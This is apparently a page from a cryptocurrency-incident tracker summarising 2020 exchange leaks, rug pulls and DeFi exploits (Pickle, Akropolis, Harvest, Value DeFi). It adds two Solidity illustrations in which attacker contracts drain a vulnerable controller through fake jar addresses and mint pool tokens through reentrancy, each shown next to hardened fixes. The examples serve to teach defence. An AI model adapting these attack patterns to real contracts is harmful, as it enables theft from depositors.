1909 hack event(s)
Description of the event: On December 1, the Australian cryptocurrency exchange BTC Markets accidentally disclosed the full names and email addresses of all of its customers in a marketing email, exposing every customer to potential phishing. The emails were sent in batches of 1,000 recipients, so each customer received the names and email addresses of 999 other users. BTC Markets CEO Caroline Bowler said the company sincerely apologized for the incident and stressed that its executives were working around the clock to minimize the impact of the breach and to implement "additional security features" to prevent future leaks. Bowler advised BTC Markets customers to make sure two-factor authentication is enabled on their accounts and to change the password of their email account.
Amount of loss: - Attack method: Information Leakage
Description of the event: The DeFi tranched-yield platform Saffron Finance announced that a bug in the Epoch 1 redemption contract caused the 50 million DAI deposited during Epoch 1 to be locked for 8 weeks. The team said it was working on an emergency fix and would then transition to Epoch 2. Saffron Finance is a DeFi asset collateralization platform released by an anonymous team; its token is SFI. It lets liquidity providers choose customized risk exposures to earn returns: in each epoch, users pick one of several risk/return tranches (A, AA, S) on Saffron and provide liquidity. An epoch lasts 14 days, during which LP funds are locked; after the epoch ends, users can remove liquidity and collect interest plus a prorated share of SFI.
Amount of loss: $ 50,000,000 Attack method: Contract Vulnerability
Description of the event: 0xMaki, a community leader of the liquidity mining project SushiSwap (SUSHI), announced in the project's Discord that the SushiSwap vulnerability had been fixed and that the lost funds (approximately US$10,000) would be reimbursed from the SUSHI treasury. Previously, SushiSwap had been attacked by a liquidity provider, who took between US$10,000 and US$15,000 in a single transaction. After 0xMaki noticed the activity, he sent the attacker a transaction carrying the message "I found you and we are working hard to fix it. Contact me on Discord to get bug bounty - 0xMaki". According to the analysis, the attacker created a new token pool from SLP tokens and WETH, used the new pool's LP token (SLP1) to trigger the conversion in SushiMaker, and with a small amount of SLP moved all of the SLP held by the SushiMaker contract into the pool they had created, thereby collecting all of the trading fees that had accumulated for that pair over the period. Repeating the process for other trading pairs let the attacker keep profiting.
Amount of loss: $ 15,000 Attack method: Price Manipulation
Description of the event: The DeFi robo-advisor Rari Capital announced on its official Twitter account that the contract vulnerability had been fixed in cooperation with Quantstamp and that no funds were lost. Earlier, because of a bug in the RGT Distributor contract, RGT token claims and deposit and withdrawal operations had been suspended. Rari Capital is reviewing the updated code to confirm that the rest of the code base contains no other vulnerabilities.
Amount of loss: - Attack method: Contract Vulnerability
Description of the event: A price-feed error on Compound led to the liquidation of roughly $90 million in assets. According to the founder of DeBank, the mass liquidation was caused by a sharp swing in the DAI price on Coinbase Pro, the data source used by Compound's oracle. This is a textbook oracle attack: manipulating the source an oracle relies on to create a short-lived price distortion and push a misleading price on-chain.
Amount of loss: - Attack method: Oracle Attack
Description of the event: The Ethereum DeFi project Pickle Finance was attacked and lost about 20 million DAI. According to SlowMist's analysis, the attacker called the swapExactJarForJar function of the Controller contract with forged contract addresses for _fromJar and _toJar, and exchanged a fake token for the real DAI held by the contract. SlowMist notes that swapExactJarForJar in Pickle Finance's Controller contract accepts two arbitrary jar contract addresses for the token swap, and that _fromJar, _toJar, _fromJarAmount and _toJarMinAmount are all caller-controlled. The attacker set both _fromJar and _toJar to their own contract address and set _fromJarAmount to the amount of DAI to pull out of the contract, about 20 million DAI.
Amount of loss: $ 20,000,000 Attack method: Fake currency for real currency
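The pattern SlowMist describes, as an added illustration that is not Pickle Finance's code: a controller whose swapExactJarForJar takes both jar addresses from the caller, calls into them, and pays out real DAI from its own balance, next to a version that validates the jars against a registry before making any external call. The IJar interface, the FakeJar contract, the registry and the single-asset simplification are assumptions made for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Illustrative example, not Pickle Finance's code. Models the vulnerable
// pattern: _fromJar and _toJar come straight from the caller and are trusted.
// The jar interface, FakeJar and the registry are assumptions.

interface IERC20 {
    function transfer(address to, uint256 amount) external returns (bool);
    function balanceOf(address who) external view returns (uint256);
}

// Assumed minimal jar surface: report the underlying asset and release it.
interface IJar {
    function token() external view returns (address);
    function withdraw(uint256 shares) external;
}

contract VulnerableController {
    // Both jar addresses are caller-controlled and never validated.
    function swapExactJarForJar(
        address _fromJar,
        address _toJar,
        uint256 _fromJarAmount,
        uint256 _toJarMinAmount
    ) external {
        IJar(_fromJar).withdraw(_fromJarAmount);      // attacker's FakeJar: no-op, releases nothing
        address want = IJar(_toJar).token();          // attacker's FakeJar: answers "DAI"
        // No before/after snapshot: "what the swap released" is read as the
        // controller's entire DAI balance.
        uint256 out = IERC20(want).balanceOf(address(this));
        require(out >= _toJarMinAmount, "!slippage");
        IERC20(want).transfer(_toJar, out);           // real DAI leaves to the attacker's contract
    }
}

// Attacker-controlled "jar": satisfies the interface but holds no assets.
contract FakeJar {
    address public immutable dai;
    constructor(address _dai) { dai = _dai; }
    function token() external view returns (address) { return dai; }
    function withdraw(uint256) external {}
    // Attack: fakeJar = new FakeJar(DAI);
    //         controller.swapExactJarForJar(address(fakeJar), address(fakeJar), X, 0);
}

contract HardenedController {
    address public governance;
    mapping(address => bool) public isJar;   // jars this controller deployed or approved

    constructor() { governance = msg.sender; }

    function registerJar(address jar) external {
        require(msg.sender == governance, "!governance");
        isJar[jar] = true;
    }

    // Same signature; this example keeps the swap single-asset for brevity.
    function swapExactJarForJar(
        address _fromJar,
        address _toJar,
        uint256 _fromJarAmount,
        uint256 _toJarMinAmount
    ) external {
        // Validate both addresses against the registry before any call into them.
        require(isJar[_fromJar] && isJar[_toJar], "!jar");
        require(_fromJar != _toJar, "same jar");
        address want = IJar(_toJar).token();
        require(IJar(_fromJar).token() == want, "!same asset");
        // Move only what this withdrawal actually released, not the whole balance.
        uint256 before = IERC20(want).balanceOf(address(this));
        IJar(_fromJar).withdraw(_fromJarAmount);
        uint256 received = IERC20(want).balanceOf(address(this)) - before;
        require(received >= _toJarMinAmount, "!slippage");
        require(IERC20(want).transfer(_toJar, received), "transfer failed");
    }
}
```

The two checks that matter are ordering and scope: the registry lookup happens before the controller calls into either address, so attacker code never runs with the controller's trust, and the payout is bounded by the balance delta of this one withdrawal rather than by whatever the controller happens to hold.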
Description of the event: On November 18, an attacker exploited a vulnerability to obtain $100,000 worth of MPH tokens. 88mph then found a vulnerability in MPHMinter, the MPH token minting contract, which could have allowed an attacker to steal all of the ETH in the Uniswap liquidity pool. With the help of the well-known white hat samczsun, that ETH was withdrawn into the governance multisig, so the funds are safe. 88mph also stated that because the attacker had put the $100,000 into the LP pool (liquidity pool), those funds were moved to the governance wallet, and the team decided to distribute them to token holders, including MPH and ETH holders.
Amount of loss: - Attack method: Contract Vulnerability
Description of the event: Matthew Liu, co-founder of the decentralized sharing-economy protocol Origin Protocol (OGN), published a post disclosing the details of the flash loan attack on Origin Dollar (OUSD), its USD stablecoin. So far the attack has caused about US$7 million in losses, including more than US$1 million deposited by Origin and its founders and employees. Origin is determining the cause of the vulnerability and whether the funds can be recovered. Origin warned: "Vault deposits are currently disabled. Please do not purchase OUSD on Uniswap or Sushiswap."
Amount of loss: $ 7,000,000 Attack method: Flash loan attack
Description of the event: The Value DeFi protocol was hit by a flash loan attack on Saturday. The attacker reportedly borrowed 80,000 ETH from the Aave protocol to execute the flash loan attack and arbitraged between DAI and USDC. After draining $7.4 million in DAI, the attacker returned $2 million to Value DeFi and kept $5.4 million. The attacker also left a mocking message for the Value DeFi team: "Do you really understand flash loans?" On Friday, Value DeFi had claimed on Twitter that it had protection against flash loan attacks; on inquiry, that tweet could no longer be found. The Value DeFi team later tweeted to confirm that its MultiStables vault had suffered "a complex attack with a net loss of 6 million US dollars".
Amount of loss: $ 6,000,000 Attack method: Flash loan attack
Description of the event: Hackers exploited a flaw in how the Akropolis project (part of the Polkadot ecosystem) verified deposited assets to launch several consecutive reentrancy attacks on its contract. This caused the Akropolis contract to mint a large number of pool tokens out of thin air, without any new assets being deposited; the attacker then used those pool tokens to withdraw DAI from the YCurve and sUSD pools, draining 2.03 million DAI from the project contract.
Amount of loss: $ 2,030,000 Attack method: Reentrancy Attack
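The two flaws described in this entry, as an added illustration that is not Akropolis code: a pool whose deposit() accepts any token address and mints pool tokens from a balance delta measured around the external call into that token, so a fake token that re-enters deposit() gets a single real DAI deposit credited twice; beside it, a version with an asset whitelist and a reentrancy guard. The pool layout, the FakeToken contract and every name are assumptions made for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Illustrative example, not Akropolis code. Pool layout, FakeToken and all
// names are assumptions. Minting from a balance delta across an unguarded
// external call lets one real deposit be credited twice.

interface IERC20 {
    function transfer(address to, uint256 amount) external returns (bool);
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
    function approve(address spender, uint256 amount) external returns (bool);
    function balanceOf(address who) external view returns (uint256);
}

contract VulnerablePool {
    IERC20 public immutable dai;                  // the real asset backing pool tokens
    mapping(address => uint256) public poolTokens;
    uint256 public totalPoolTokens;

    constructor(IERC20 _dai) { dai = _dai; }

    // Flaw 1: `token` is never checked against a list of supported assets.
    // Flaw 2: minting uses (balance after - balance before) around an
    //         external call into `token`, with no reentrancy guard.
    function deposit(address token, uint256 amount) external {
        uint256 before = dai.balanceOf(address(this));
        IERC20(token).transferFrom(msg.sender, address(this), amount); // FakeToken re-enters here
        uint256 received = dai.balanceOf(address(this)) - before;      // inner deposit's DAI counted again
        poolTokens[msg.sender] += received;
        totalPoolTokens += received;
    }

    function withdraw(uint256 amount) external {
        poolTokens[msg.sender] -= amount;
        totalPoolTokens -= amount;
        require(dai.transfer(msg.sender, amount), "transfer failed");
    }
}

// Attacker-controlled "token". Its transferFrom re-enters the pool with a real
// DAI deposit; the outer call then mints a second batch of pool tokens for the
// same DAI. Each repetition mints pool tokens without any new DAI.
contract FakeToken {
    VulnerablePool public immutable pool;
    IERC20 public immutable dai;
    bool private entered;

    constructor(VulnerablePool _pool, IERC20 _dai) {
        pool = _pool;
        dai = _dai;
        _dai.approve(address(_pool), type(uint256).max); // this contract must be funded with DAI
    }

    function transferFrom(address, address, uint256 amount) external returns (bool) {
        if (!entered) {
            entered = true;
            pool.deposit(address(dai), amount);  // inner: real DAI in, `amount` pool tokens to this contract
            entered = false;
        }
        return true;                             // outer: nothing moved, yet `amount` more pool tokens minted
    }

    function attack(uint256 amount) external {
        pool.deposit(address(this), amount);     // pool gains `amount` DAI, we gain 2*amount pool tokens
        pool.withdraw(2 * amount);               // the excess is paid out of other depositors' DAI
    }
}

contract HardenedPool {
    IERC20 public immutable dai;
    mapping(address => bool) public supported;   // assets approved for deposit (extend via a governance-gated setter)
    mapping(address => uint256) public poolTokens;
    uint256 public totalPoolTokens;
    uint256 private lock = 1;

    modifier nonReentrant() {
        require(lock == 1, "reentrant call");
        lock = 2;
        _;
        lock = 1;
    }

    constructor(IERC20 _dai) { dai = _dai; supported[address(_dai)] = true; }

    function deposit(address token, uint256 amount) external nonReentrant {
        require(supported[token], "unsupported asset");     // Fix 1: only approved assets can be deposited
        uint256 before = IERC20(token).balanceOf(address(this));
        IERC20(token).transferFrom(msg.sender, address(this), amount);
        uint256 received = IERC20(token).balanceOf(address(this)) - before;
        poolTokens[msg.sender] += received;                 // Fix 2: the guard blocks the nested deposit
        totalPoolTokens += received;
    }
}
```

Either fix alone closes this particular path (a whitelisted token cannot re-enter, and a guard stops the nested call even for an unknown token), but both belong in the hardened version: the whitelist removes the attacker's code from the call graph, and the guard protects the balance-delta accounting against any other callback the pool might add later.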
Description of the event: Cheese Bank, a decentralized autonomous digital banking platform on Ethereum, lost US$3.3 million to a hacker. Using flash loans taken from platforms such as dYdX and Uniswap, the attacker manipulated the platform's automated market maker (AMM)-based price oracle through a series of malicious borrowing operations, causing a total loss of over US$3.3 million, including US$2 million in USDC.
Amount of loss: $ 3,300,000 Attack method: Flash loan attack
Description of the event: Mike Kayamori, CEO of the cryptocurrency exchange Liquid, posted a notice on the official website about a data breach at the exchange on November 13. The domain hosting provider that manages one of Liquid's core domain names mistakenly transferred control of the account and domain to a malicious actor, who changed DNS records and thereby took control of a large number of internal email accounts, partially compromised the exchange's infrastructure and gained access to stored documents. Once the intruder was detected, Liquid acted immediately to contain the attack, prevent further intrusion and reduce the risk to customer accounts and assets, while conducting a full review of its infrastructure. It confirmed that customer funds were safe and that its MPC (multi-party computation) based cold wallets were intact. The relevant regulators were notified of the intrusion, and Liquid said it would continue to communicate over the following days. The attacker may have obtained users' email addresses, names, postal addresses and passwords; Liquid was still investigating whether the attacker had accessed the identity documents and photos submitted for KYC verification and promised updates after the investigation. Liquid announced its final findings on January 20, 2021: 169,782 user records, including email addresses, names, encrypted passwords and API keys, were leaked. The personal information that may have been accessed illegally belongs to users who completed KYC before October 2018; the identity verification documents of 28,639 users, such as ID cards, selfies and proof of address, may have been exposed.
Amount of loss: - Attack method: Information Leakage
Description of the event: According to FXStreet, the community accused Daniel Wood and an anonymous developer of SharkTron, a Tron-based DeFi project whitelisted on JustSwap, of absconding with funds. The exact losses are not yet known, but Twitter users reported losing 366 million to 400 million TRX (worth about US$10 million). The TRON Foundation tweeted that it had contacted Binance to jointly trace the stolen funds and the people involved, and that Binance had frozen some of the funds. The TRON Foundation will also work with other exchanges to trace the stolen funds, and it recommended that victims file a report with their local police.
Amount of loss: $ 10,000,000 Attack method: Rug Pull
Description of the event: On November 9, a user named "aaron67" posted about having BSV stolen and urged everyone to immediately stop using the multisig accumulator multi-signature scheme implemented in ElectrumSV. The scheme's locking script had a serious bug, which led to 600 BSV being stolen on November 6. After the theft, the user promptly contacted Roger Taylor, the author of ElectrumSV, and the serious bug was subsequently confirmed. The Note.SV developers also said they had immediately analyzed the incident to locate the source of the bug and had notified the wallet author and community users.
Amount of loss: 600 BSV Attack method: Security Vulnerability
Description of the event: The Grin network has reportedly suffered a 51% attack: on Saturday an unknown entity controlled more than 57% of the network's hashrate. A notice on the Grin website advises people to wait for "additional confirmations for payment finality." The notice, posted on November 9, reads: "Important notice: Grin's network hashrate has increased significantly in a short period of time. It is worth noting that this coincides with the time when the NiceHash rate doubled. Currently, more than 50% of the network hashrate is outside the known pools. Considering these circumstances, it is wise to wait for additional confirmations of transactions to ensure the finality of the payment." Earlier, on November 8, 2Miners tweeted that the Grin network was under a 51% attack and that it had stopped payouts, warning users to proceed at their own risk because new blocks might be rejected.
Amount of loss: - Attack method: 51% attack
Description of the event: Phishing and scams targeting Ledger wallet owners are on the rise; one scam website alone took more than 1,150,000 XRP from victims. The scam uses phishing emails to direct users to a fake Ledger website, where victims are tricked into downloading malware posing as a security update, which then drains their entire Ledger wallet balance. According to the community-run fraud identification website xrplorer, the XRP obtained through the scam was sent to Bittrex in 5 deposits, but the exchange "could not freeze the XRP in time".
Amount of loss: 1,150,000 XRP Attack method: Phishing attack
Description of the event: The DeFi lending platform PercentFinance wrote in a blog post on November 4 that some of its money markets had run into problems that could leave users' funds permanently locked. The team froze the USDC, ETH and WBTC markets; a total of 446,000 USDC, 28 WBTC and 313 ETH are frozen, worth approximately US$1 million. The post stated that half of the locked funds belonged to PercentFinance's "community improvement team". Withdrawals from the other markets have resumed, but the team urged users not to borrow from any PercentFinance market during this period. PercentFinance is reportedly a fork of Compound Finance.
Amount of loss: $ 1,000,000 Attack method: Unknown
Description of the event: Cointelegraph reported that on November 2, a project called Axion Network launched its AXN token and was hacked a few hours after launch. 79 billion AXN were minted and dumped on the market, driving the token price to almost zero. The hacker made a profit of 1,300 ETH, or about $500,000.
Amount of loss: $ 500,000 Attack method: Contract Vulnerability (using the unstake function of the Axion Staking contract, the attacker minted approximately 80 billion AXN tokens)
Description of the event: Alon Gal, chief technology officer of the cybercrime intelligence company Hudson Rock, recently tweeted that on October 27 the cold wallet of EtherCrash, which bills itself as "the most mature and largest gambling game on Ethereum", was stolen, with a loss of about US$2.5 million. EtherCrash reportedly posted a notice on Discord saying that its cold wallet had been compromised and that two large withdrawals had been made. EtherCrash said it would compensate users for their losses, but that this would take some time because the losses were substantial.
Amount of loss: $ 2,500,000 Attack method: Wallet Stolen
Description of the event: On-chain data shows that a large amount of funds was moved out of the Harvest Finance pools; about US$24 million (other reports put the total drained at approximately US$34 million) was cashed out through a series of contract transactions, mostly via renBTC. The hacker's initial ETH came from the Ethereum mixing service Tornado.cash; the hash of that transaction is 0x35f8d2f572fceaac9288e5d462117850ef2694786992a8c3f6d02612277b0877. On the Ethereum block explorer it can be seen that the hacker transferred 20 WETH to the Harvest Finance contract (address: 0xc6028a9fa486f52efd2b95b949ac630d287ce0af) and finally transferred the 20 ETH back to their own address. Harvest Finance said on Twitter that, like other economic arbitrage attacks, this one started with a huge flash loan and repeatedly manipulated the price in one money Lego (the Curve y pool) to drain funds from another (fUSDT, fUSDC). The attacker then converted the funds to renBTC and cashed out. As with other flash loan attacks, there was no time to respond: the attack took 7 minutes end to end. The attacker returned $2,478,549.94 to the deployer in the form of USDT and USDC. On December 7, Harvest Finance officially launched claim portals for GRAIN, USDC and USDT. The team said that, counting the $2.5 million the hacker returned, user losses were reduced to 13.5%, and it is compensating affected users with a mix of USDC, USDT and GRAIN tokens. Users receive GRAIN tokens in proportion to their deposits, and the $2.5 million returned by the hacker is distributed proportionally.
Amount of loss: $ 21,500,000 Attack method: Flash loan attack